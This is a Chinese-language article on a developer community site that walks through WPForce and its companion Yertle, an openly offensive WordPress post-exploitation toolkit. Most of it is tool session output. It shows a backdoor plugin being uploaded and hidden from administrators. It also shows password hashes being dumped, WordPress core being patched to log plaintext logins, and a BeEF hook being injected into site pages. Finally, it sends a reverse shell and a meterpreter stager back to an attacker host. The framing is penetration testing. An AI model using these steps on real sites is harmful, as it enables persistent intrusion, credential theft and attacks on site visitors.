备案控制台
探索云世界
开发者社区 开发与运维 文章 正文

WPForce——一款 Wordpress 漏洞利用工具

2017-09-19 3682
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 本文讲的是WPForce——一款 Wordpress 漏洞利用工具,在渗透测试过程中,我们可能会遇到运行WordPress的Web服务器。虽然Web服务器上的大多数WordPress服务器都配置了强大的密码和安全插件,但内部网络很少出现这种情况。
本文讲的是 WPForce——一款 Wordpress 漏洞利用工具

WPForce一款 Wordpress 漏洞利用工具

在渗透测试过程中,我们可能会遇到运行WordPress的Web服务器。虽然Web服务器上的大多数WordPress服务器都配置了强大的密码和安全插件,但内部网络很少出现这种情况。因此,攻击者经常可以在过时的WordPress版本中找到漏洞,或者就是简单地对管理密码进行猜测。一旦攻击者猜到管理密码,就可以对其他系统进行攻击。除了特权提升之外,还可以使用WordPress本身对客户端发起一些其他攻击。

为了方便测试,我们将使用自己开发的用于测试WordPress的工具——WPForce。WPForce和WPScan相比,具有以下2个优点:

1.与WPScan不同,WPScan会再次执行WordPress的登录页面;

2.WPForce会使用经过身份验证的API调用来测试登录凭据的有效性:

WPForce一款 Wordpress 漏洞利用工具

识别有效的登录凭据后,WPForce套件——Yertle中的配套脚本可用于将后门上传到WordPress服务器上并执行多个后期开发模块。运行Yertle比较简单,只需提供URL,用户名,密码和后门类型即可。虽然有两种类型的后门可供上传,但我们更喜欢-interactive选项:

WPForce一款 Wordpress 漏洞利用工具

一旦我们开始运行脚本,WPForce就将登录到WordPress站点并上传一个插件。也就是说,我们只需要提供-e参数并上传目录名称,就可以随时访问这个后门:

这个插件就会采取类似于SQLmap的os-shell的命令,要查看可用的模块,可以输入“help”或“?”:

os-shell> help
 
Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page

我们可以运行的一个有用的后期开发模块是hashdump,hashdump会登录SQL数据库,查询包含密码的哈希值,并返回输出。然后,我们可以破解这些散列,并开始尝试使用这些登录凭证攻击其他系统:

os-shell> hashdump
ID: 1  - Username: admin  Password: $P$BAgwF1u99OZU1iqTgTIrUmBbtIjRMu1  Email: Quaoar@localhost.com
ID: 2  - Username: wpuser  Password: $P$BdcZZVb0ssMccLU1ECFCtUihocqQ0S.  Email: wpuser@localhost.com
ID: 3  - Username: n00py  Password: $P$B0mYQT38IOJtOr/nl4dchdqgCrxsG/.  Email: n00py@protonmail.com
 
os-shell>

不仅可以收集散列,还可以收集明文凭证。通过在WordPress核心中修补PHP文件,我们可以在用户认证时以明文形式记录所有密码:

os-shell> keylogger
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
wp_signon function patched.  Do not run this more than once.  Use 'keylog' to check the log file.
os-shell>

经过警告后,用户将会对WordPress核心进行修改,验证功能将被修补:

WPForce一款 Wordpress 漏洞利用工具

等待用户登录后,我们可以通过键入“keylog”来查看日志文件来查看明文凭据:

os-shell> keylog
2017-03-30 - Username:  && Password:
2017-03-30 - Username: n00py && Password: thisisalsomynetworkpassword

除了查看登录凭据外,我们还可以利用BeEF控制目标主机的浏览器, Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网:

os-shell> beef
This module modifies files within the WordPress core.  Would you like to continue? (Y/n) Y
IP Address: 10.0.1.16
BeEF hook added!  Check BeEF for any hooked clients. Do not run this multiple times.

注入hook后,我们只需要等待用户浏览网站即可,一旦用户浏览网站,这些网站就立马被hook了。接下来,我们就可以发送任何我们想要的JavaScript有效载荷, BeEF包含可以针对客户端启动的大量攻击:

WPForce一款 Wordpress 漏洞利用工具

有效载荷在客户端的浏览器中执行:

WPForce一款 Wordpress 漏洞利用工具

与这些模块一样有用的还有另一种类型的shell,这时我们有两个选项可供选择:常规的反向TCP shell和一个被PHP篡改的shell。要升级到完全交互的shell,只需运行:

os-shell> shell
IP Address: 10.0.1.4
Port: 8080
Sending reverse shell to 10.0.1.4 port 8080
os-shell>

并在所选端口上进行监控:

root@Kali:~/WPForce$ nc -l 8080
bash: no job control in this shell
www-data@Quaoar:/var/www/wordpress/wp-content/plugins/aekpmsu$

如果我们想要一个更换shell,可以加载metasploit并运行:

os-shell> meterpreter
IP Address: 10.0.1.4
Port: 4444
Sending meterpreter stager to connect back to 10.0.1.4:4444
os-shell>

并在metasploit内接收更换:

[*] Started reverse handler on 10.0.1.4:4444
[*] Starting the payload handler...
[*] Sending stage (33068 bytes) to 10.0.1.21
[*] Meterpreter session 1 opened (10.0.1.4:4444 -> 10.0.1.21:60763) at 2017-03-29 20:49:16 -0600

最后,使用WPForce时,有几种方法可以使这个检测工具更加隐蔽。默认情况下,该模块将其自身注册为WordPress中的插件,此插件对管理员来说是可见的:

WPForce一款 Wordpress 漏洞利用工具

要让后门从插件屏幕中“消失”,只需简单的运行命令“隐形”,隐形后,后门仍然可以访问:

os-shell> stealth



原文发布时间为:2017年4月19日
本文作者:xiaohui 
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
文章标签:
Shell
测试技术
Web App开发
安全
数据安全/隐私保护
关键词:
wordpress漏洞
wordpress工具
玄学酱
目录
相关文章
拈花倾城
|
1月前
|
存储 安全 前端开发
WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
拈花倾城
70 0
李火火
|
7月前
|
Web App开发 移动开发 安全
WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
李火火
265 1
游客oh6lc6rmikcss
|
11月前
|
SQL 安全 数据库
WordPress插件中的流行的严重错误发布的PoC漏洞
WordPress插件中的流行的严重错误发布的PoC漏洞
游客oh6lc6rmikcss
273 0
码农工程师
|
安全 PHP
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
码农工程师
170 0
ap0581w9c
修改WordPress语言包po文件的方法和工具
转载自:http://clangcn.com/blog/archives/599.html 在改主题的时候遇到一个麻烦的问题.虽然官方有语言包对WordPress进行汉化,但是发现翻译的和我想要的不一样.于是就上网查了查.找到了一个好用的工具.我们知道语言包是两个文件:zh_CN.po和zh_CN.mo如果你想用文本编辑器来修改.po文件的话是没有作用的.修改.po的同时还必须修改.mo文件而.mo是没法编辑的.这时候就得用”po-edit”了.按下面的步骤做就可以改成你想要的翻译效果. 使用方法:1.当然是先下载po-edit这个软件.没软件你自己编啊,呵呵。
ap0581w9c
1113 0
网站安全
|
SQL 安全 前端开发
网站漏洞检测 wordpress sql注入漏洞代码审计与修复
wordpress系统本身代码,很少出现sql注入漏洞,反倒是第三方的插件出现太多太多的漏洞,我们SINE安全发现,仅仅2019年9月份就出现8个插件漏洞,因为第三方开发的插件,技术都参差不齐,对安全方面也不是太懂导致写代码过程中没有对sql注入,以及xss跨站进行前端安全过滤,才导致发生sql注入漏洞。
网站安全
394 0
网站漏洞检测 wordpress sql注入漏洞代码审计与修复
网站安全
|
安全 关系型数据库 MySQL
网站漏洞修复对WordPress 致命漏洞注入shell
2019年正月刚开始,WordPress最新版本存在远程代码注入获取SHELL漏洞,该网站漏洞影响的版本是wordpress5.0.0,漏洞的产生是因为image模块导致的,因为代码里可以进行获取目录权限,以及文件包含功能,导致远程代码注入成功。
网站安全
385 0
网站漏洞修复对WordPress 致命漏洞注入shell
网站安全
|
SQL 弹性计算 安全
WordPress4.9 最新版本网站安全漏洞详情与修复
wordpress 目前互联网的市场占有率较高,许多站长以及建站公司都在使用这套开源的博客建站系统来设计网站,wordpress的优化以及html静态化,深受google以及搜索引擎的喜欢,全世界大约有着百分之28的网站都在使用这套系统,国外,外贸网站,个人博客使用的最多。
网站安全
192 0
WordPress4.9 最新版本网站安全漏洞详情与修复
网站安全
|
安全 数据库
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目
网站安全
211 0
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
stefanie燕
|
弹性计算 安全
阿里云提示wordpress IP验证不当漏洞手动处
登录阿里云后台 有漏洞安全修复提示,级别尽快修复,同时给出ECS服务器管理重要通知:您的云服务器(xxx.xx.xxx.xx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(UDP:ALL)的访问,阻断预计将在2018-04-23 09:56:58时间内结束,请及时进行安全自查。若有疑问,请工单或电话联系阿里云售后
stefanie燕
227 0

热门文章

最新文章

  • 1
    基于WordPress开发的高颜值的自适应主题,支持白天与黑夜模式
  • 2
    使用docker快速搭建wordpress服务,并指定域名访问
  • 3
    WP-AutoPostPro WordPress自动采集发布插件
  • 4
    WordPress外贸建站教程
  • 5
    SiteGround搭建WordPress
  • 6
    WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
  • 7
    怎么在树莓派上搭建WordPress博客网站,并发布到外网可访问?
  • 8
    SiteGround如何设置WordPress网站自动更新
  • 9
    信息收集 -- WordPress网站
  • 10
    Docker部署WordPress LNMP(Nginx PHP MySQL)环境实践
  • 1
    WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
    70
  • 2
    SiteGround如何设置WordPress网站自动更新
    37
  • 3
    WordPress外贸建站教程
    104
  • 4
    SiteGround搭建WordPress
    102
  • 5
    怎么在树莓派上搭建WordPress博客网站,并发布到外网可访问?
    65
  • 6
    信息收集 -- WordPress网站
    27
  • 7
    VPS搭建WordPress
    115
  • 8
    分享58个wordpress模板,总有一款适合您
    63
  • 9
    WordPress动漫图片主题cxudy模板
    27
  • 10
    服务器搭建记录 · Wordpress
    59

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册

    • 相关实验场景

    更多
  • 通过Helm CLI部署wordpress到ACK集群
  • 手动搭建WordPress(CentOS 8)
  • 通过Docker部署WordPress 论坛
  • 基于Linux命令实现WordPress手动建站
  • 远程桌面环境使用指南
  • 使用阿里云容器服务和容器网络文件系统搭建WordPress网站
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)